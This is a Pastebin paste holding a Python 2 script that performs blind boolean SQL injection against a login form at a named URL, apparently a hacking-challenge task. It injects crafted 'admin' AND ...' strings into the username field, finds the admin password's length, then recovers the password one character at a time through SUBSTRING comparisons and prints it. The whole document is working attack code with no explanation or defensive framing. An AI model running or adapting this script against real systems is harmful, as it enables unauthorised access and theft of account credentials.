Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/python
- import urllib
- URL = 'http://hakerium.cba.pl/zad1/'
- REQUESTS = 0
- def query_returned_rows(html):
- return "logowanie." in html
- def get_ith_password_char(i):
- global REQUESTS
- alphabet = "QWERTYUIOPASDFGHJKLZXCVBNMqwertyuiopasdfghjklzxcvbnm0123456789!@#$%^&*()-=[];',./<>?:|{}_+"
- for char in alphabet:
- sql_query = "admin' AND SUBSTRING(password,{},1)=BINARY '{}".format(i,char)
- post_query = urllib.urlencode({'username':sql_query,'password':''})
- u = urllib.urlopen(URL, post_query)
- REQUESTS+=1
- if query_returned_rows(u.read()):
- u.close()
- return char
- u.close()
- def main():
- # Sprawdzamy dlugosc.
- global REQUESTS
- password_len = 0
- for i in xrange(2, 100):
- sql_query = "admin' AND LENGTH(password)={} OR '".format(i)
- post_query = urllib.urlencode({'username':sql_query, 'password':''})
- u = urllib.urlopen(URL, post_query)
- REQUESTS+=1
- if query_returned_rows(u.read()):
- password_len = i
- print 'Password\'s length is {}.'.format(password_len)
- break
- u.close()
- password = ""
- for i in xrange(1,password_len+1):
- password += get_ith_password_char(i)
- print "Gotcha! Password so far is: {}".format(password)
- print
- print "Password: {}".format(password)
- print "Requests needed: {}".format(REQUESTS)
- if __name__ == '__main__':
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement